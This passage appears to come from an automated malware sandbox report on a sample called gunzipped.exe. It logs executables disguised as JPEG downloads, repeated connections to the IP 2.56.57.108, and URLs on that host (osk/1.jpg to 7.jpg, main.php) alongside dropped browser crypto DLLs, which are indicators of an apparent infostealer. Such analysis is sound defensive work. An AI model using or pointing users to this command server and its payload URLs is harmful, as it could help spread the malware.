00 30 08 00 00 02 00 00 00 e6 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 c8 03 00 00 00 40 08 00 00 04 00 00 00 e8 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 35 00 00 00 00 00 4d 06 00 00 00 50 08 00 00 08 00 00 00 ec 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 35 31 00 00 00 00 00 60 43 00 00 00 60 08 00 00 44 00 00 00 f4 07 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 06 Jan 2022 06:57:28 GMTServer: Apache/2.4.12 (Win32) OpenSSL/1.0.1m PHP/5.3.29 mod_wsgi/4.4.11 Python/2.7.10Last-Modified: Thu, 06 Jun 2019 04:00:58 GMTETag: "519d0-58a9fc2e87280"Accept-Ranges: bytesContent-Length: 334288Keep-Alive: timeout=5, max=98Connection: Keep-AliveContent-Type: image/jpegData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 f0 2f 05 84 91 41 56 84 91 41 56 84 91 41 56 8d e9 d2 56 88 91 41 56 5d f3 40 57 86 91 41 56 1a 31 86 56 85 91 41 56 5d f3 42 57 80 91 41 56 5d f3 44 57 8f 91 41 56 5d f3 45 57 8f 91 41 56 a6 f1 40 57 80 91 41 56 4f f2 40 57 87 91 41 56 84 91 40 56 d6 91 41 56 4f f2 42 57 86 91 41 56 4f f2 45 57 c0 91 41 56 4f f2 41 57 85 91 41 56 4f f2 be 56 85 91 41 56 4f f2 43 57 85 91 41 56 52 69 63 68 84 91 41 56 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 d8 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 d8 03 00 00 66 01 00 00 00 00 00 29 dd 03 00 00 10 00 00 00 f0 03 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 05 00 00 04 00 00 a3 73 05 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 70 e6 04 00 50 00 00 00 c0 e6 04 00 c8 00 00 00 00 40 05 00 78 03 00 00 00 00 00 00 00 00 00 00 00 fc 04 00 d0 1d 00 00 00 50 05 00 e0 16 00 00 30 e2 04 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 88 e2 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 f0 03 00 38 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 74 d6 03 00 00 10 00 00 00 d8 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 fc fe 00 00 00 f0 03 00 00 00 01 00 00 dc 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 2c 48 00 00 00 f0 04 00 00 04 00 00 00 dc 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 40 05 00 00 04 00 00 00 e0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 e0 16 00 00 00 50 05 00 00 18 00 00 00 e4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 06 Jan 2022 06:57:29 GMTServer: Apache/2.4.12 (Win32) OpenSSL/1.0.1m PHP/5.3.29 mod_wsgi/4.4.11 Python/2.7.10Last-Modified: Thu, 06 Jun 2019 04:01:20 GMTETag: "217d0-58a9fc4382400"Accept-Ranges: bytesContent-Length: 137168Keep-Alive: timeout=5, max=97Connection: Keep-AliveContent-Type: image/jpegData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8d c2 55 b1 c9 a3 3b e2 c9 a3 3b e2 c9 a3 3b e2 c0 db a8 e2 d9 a3 3b e2 57 03 fc e2 cb a3 3b e2 10 c1 38 e3 c7 a3 3b e2 10 c1 3f e3 c2 a3 3b e2 10 c1 3a e3 cd a3 3b e2 10 c1 3e e3 db a3 3b e2 eb c3 3a e3 c0 a3 3b e2 c9 a3 3a e2 77 a3 3b e2 02 c0 3f e3 c8 a3 3b e2 02 c0 3e e3 dd a3 3b e2 02 c0 3b e3 c8 a3 3b e2 02 c0 c4 e2 c8 a3 3b e2 02 c0 39 e3 c8 a3 3b e2 52 69 63 68 c9 a3 3b e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 c4 5f eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 7a 01 00 00 86 00 00 00 00 00 00 e0 82 01 00 00 10 00 00 00 90 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 40 02 00 00 04 00 00 16 33 02 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 40 c0 01 00 74 1e 00 00 b4 de 01 00 2c 01 00 00 00 20 02 00 78 03 00 00 00 00 00 00 00 00 00 00 00 fa 01 00 d0 1d 00 00 00 30 02 00 68 0c 00 00 00 b9 01 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 54 b9 01 00 18 00 00 00 68 b8 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 90 01 00 f4 02 00 00 6c be 01 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ca 78 01 00 00 10 00 00 00 7a 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 5e 65 00 00 00 90 01 00 00 66 00 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 bc 0b 00 00 00 00 02 00 00 02 00 00 00 e4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 00 00 38 00 00 00 00 10 02 00 00 02 00 00 00 e6 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 20 02 00 00 04 00 00 00 e8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 0c 00 00 00 30 02 00 00 0e 00 00 00 ec 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 06 Jan 2022 06:57:29 GMTServer: Apache/2.4.12 (Win32) OpenSSL/1.0.1m PHP/5.3.29 mod_wsgi/4.4.11 Python/2.7.10Last-Modified: Thu, 06 Jun 2019 04:01:30 GMTETag: "6b738-58a9fc4d0ba80"Accept-Ranges: bytesContent-Length: 440120Keep-Alive: timeout=5, max=96Connection: Keep-AliveContent-Type: image/jpegData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a6 c8 bc 41 e2 a9 d2 12 e2 a9 d2 12 e2 a9 d2 12 56 35 3d 12 e0 a9 d2 12 eb d1 41 12 fa a9 d2 12 3b cb d3 13 e1 a9 d2 12 e2 a9 d3 12 22 a9 d2 12 3b cb d1 13 eb a9 d2 12 3b cb d6 13 ee a9 d2 12 3b cb d7 13 f4 a9 d2 12 3b cb da 13 95 a9 d2 12 3b cb d2 13 e3 a9 d2 12 3b cb 2d 12 e3 a9 d2 12 3b cb d0 13 e3 a9 d2 12 52 69 63 68 e2 a9 d2 12 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 16 38 27 59 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 04 06 00 00 82 00 00 00 00 00 00 50 b1 03 00 00 10 00 00 00 20 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 d0 06 00 00 04 00 00 61 7a 07 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 f0 43 04 00 82 cf 01 00 f4 52 06 00 2c 01 00 00 00 80 06 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 78 06 00 38 3f 00 00 00 90 06 00 34 3a 00 00 f0 66 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 28 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 50 06 00 f0 02 00 00 98 40 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 72 03 06 00 00 10 00 00 00 04 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 10 28 00 00 00 20 06 00 00 18 00 00 00 08 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 36 14 00 00 00 50 06 00 00 16 00 00 00 20 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 70 06 00 00 02 00 00 00 36 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 03 00 00 00 80 06 00 00 04 00 00 00 38 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 34 3a 00 00 00 90 06 00 00 3c 00 00 00 3c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 06 Jan 2022 06:57:30 GMTServer: Apache/2.4.12 (Win32) OpenSSL/1.0.1m PHP/5.3.29 mod_wsgi/4.4.11 Python/2.7.10Last-Modified: Thu, 06 Jun 2019 04:01:44 GMTETag: "1303d0-58a9fc5a65a00"Accept-Ranges: bytesContent-Length: 1246160Keep-Alive: timeout=5, max=95Connection: Keep-AliveContent-Type: image/jpegData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 23 83 34 8c 67 e2 5a df 67 e2 5a df 67 e2 5a df 6e 9a c9 df 73 e2 5a df be 80 5b de 65 e2 5a df f9 42 9d df 63 e2 5a df be 80 59 de 6a e2 5a df be 80 5f de 6d e2 5a df be 80 5e de 6c e2 5a df 45 82 5b de 6f e2 5a df ac 81 5b de 64 e2 5a df 67 e2 5b df 90 e2 5a df ac 81 5e de 6d e3 5a df ac 81 5a de 66 e2 5a df ac 81 a5 df 66 e2 5a df ac 81 58 de 66 e2 5a df 52 69 63 68 67 e2 5a df 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 ad 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 ea 0e 00 00 1e 04 00 00 00 00 00 77 f0 0e 00 00 10 00 00 00 00 0f 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 40 13 00 00 04 00 00 b7 bb 13 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 9d 11 00 88 a0 00 00 88 3d 12 00 54 01 00 00 00 b0 12 00 70 03 00 00 00 00 00 00 00 00 00 00 00 e6 12 00 d0 1d 00 00 00 c0 12 00 14 7d 00 00 70 97 11 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 97 11 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 81 e8 0e 00 00 10 00 00 00 ea 0e 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 10 52 03 00 00 00 0f 00 00 54 03 00 00 ee 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 74 47 00 00 00 60 12 00 00 22 00 00 00 42 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 70 03 00 00 00 b0 12 00 00 04 00 00 00 64 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 14 7d 00 00 00 c0 12 00 00 7e 00 00 00 68 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 06 Jan 2022 06:57:31 GMTServer: Apache/2.4.12 (Win32) OpenSSL/1.0.1m PHP/5.3.29 mod_wsgi/4.4.11 Python/2.7.10Last-Modified: Thu, 06 Jun 2019 04:02:02 GMTETag: "14748-58a9fc6b90280"Accept-Ranges: bytesContent-Length: 83784Keep-Alive: timeout=5, max=94Connection: Keep-AliveContent-Type: image/jpegData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 01 f9 a3 4e 45 98 cd 1d 45 98 cd 1d 45 98 cd 1d f1 04 22 1d 47 98 cd 1d 4c e0 5e 1d 4e 98 cd 1d 45 98 cc 1d 6c 98 cd 1d 9c fa c9 1c 55 98 cd 1d 9c fa ce 1c 56 98 cd 1d 9c fa c8 1c 41 98 cd 1d 9c fa c5 1c 5f 98 cd 1d 9c fa cd 1c 44 98 cd 1d 9c fa 32 1d 44 98 cd 1d 9c fa cf 1c 44 98 cd 1d 52 69 63 68 45 98 cd 1d 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 0c 38 27 59 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 ea 00 00 00 20 00 00 00 00 00 00 00 ae 00 00 00 10 00 00 00 00 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 40 01 00 00 04 00 00 bc 11 02 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 b0 f0 00 00 14 09 00 00 c0 10 01 00 8c 00 00 00 00 20 01 00 08 04 00 00 00 00 00 00 00 00 00 00 00 08 01 00 48 3f 00 00 00 30 01 00 94 0a 00 00 b0 1f 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 1f 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 bc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 e9 00 00 00 10 00 00 00 ea 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 44 06 00 00 00 00 01 00 00 02 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 b8 05 00 00 00 10 01 00 00 06 00 00 00 f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 08 04 00 00 00 20 01 00 00 06 00 00 00 f6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 0a 00 00 00 30 01 00 00 0c 00 00 00 fc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108

Source: gunzipped.exe, gunzipped.exe, 00000001.00000002.332350295.00000000007D7000.00000002.00000001.sdmp, gunzipped.exe, 00000001.00000000.307855730.00000000007B0000.00000040.00000001.sdmp, gunzipped.exe, 00000001.00000000.308868870.00000000007B0000.00000040.00000001.sdmp	String found in binary or memory: http://2.56.57.108/osk/
Source: gunzipped.exe, 00000001.00000002.332379792.000000000091C000.00000004.00000010.sdmp, gunzipped.exe, 00000001.00000002.332482820.0000000000C4A000.00000004.00000020.sdmp	String found in binary or memory: http://2.56.57.108/osk//1.jpg
Source: gunzipped.exe, 00000001.00000002.332379792.000000000091C000.00000004.00000010.sdmp	String found in binary or memory: http://2.56.57.108/osk//1.jpghttp://2.56.57.108/osk//4.jpghttp://2.56.57.108/osk//7.jpghttp://2.56.5
Source: gunzipped.exe, 00000001.00000002.332379792.000000000091C000.00000004.00000010.sdmp, gunzipped.exe, 00000001.00000002.332482820.0000000000C4A000.00000004.00000020.sdmp	String found in binary or memory: http://2.56.57.108/osk//2.jpg
Source: gunzipped.exe, 00000001.00000002.332379792.000000000091C000.00000004.00000010.sdmp	String found in binary or memory: http://2.56.57.108/osk//2.jpghttp://2.56.57.108/osk//6.jpghttp://2.56.57.108/osk//3.jpghttp://2.56.5
Source: gunzipped.exe, 00000001.00000002.332379792.000000000091C000.00000004.00000010.sdmp, gunzipped.exe, 00000001.00000002.332482820.0000000000C4A000.00000004.00000020.sdmp	String found in binary or memory: http://2.56.57.108/osk//3.jpg
Source: gunzipped.exe, 00000001.00000002.332379792.000000000091C000.00000004.00000010.sdmp, gunzipped.exe, 00000001.00000002.332482820.0000000000C4A000.00000004.00000020.sdmp	String found in binary or memory: http://2.56.57.108/osk//4.jpg
Source: gunzipped.exe, 00000001.00000002.332379792.000000000091C000.00000004.00000010.sdmp, gunzipped.exe, 00000001.00000002.332482820.0000000000C4A000.00000004.00000020.sdmp	String found in binary or memory: http://2.56.57.108/osk//5.jpg
Source: gunzipped.exe, 00000001.00000002.332482820.0000000000C4A000.00000004.00000020.sdmp	String found in binary or memory: http://2.56.57.108/osk//5.jpg2
Source: gunzipped.exe, 00000001.00000002.332379792.000000000091C000.00000004.00000010.sdmp	String found in binary or memory: http://2.56.57.108/osk//6.jpg
Source: gunzipped.exe, 00000001.00000002.332379792.000000000091C000.00000004.00000010.sdmp, gunzipped.exe, 00000001.00000002.332482820.0000000000C4A000.00000004.00000020.sdmp	String found in binary or memory: http://2.56.57.108/osk//7.jpg
Source: gunzipped.exe, 00000001.00000002.332482820.0000000000C4A000.00000004.00000020.sdmp	String found in binary or memory: http://2.56.57.108/osk//7.jpgB
Source: gunzipped.exe, 00000001.00000002.332379792.000000000091C000.00000004.00000010.sdmp	String found in binary or memory: http://2.56.57.108/osk//main.php
Source: gunzipped.exe, 00000001.00000003.317919411.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.314059612.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.317143663.00000000031F1000.00000004.00000001.sdmp, softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: gunzipped.exe, 00000001.00000003.317919411.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.314059612.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.317143663.00000000031F1000.00000004.00000001.sdmp, softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: gunzipped.exe, 00000001.00000003.317919411.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.314059612.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.317143663.00000000031F1000.00000004.00000001.sdmp, softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: gunzipped.exe, 00000001.00000003.317919411.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.314059612.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.317143663.00000000031F1000.00000004.00000001.sdmp, softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
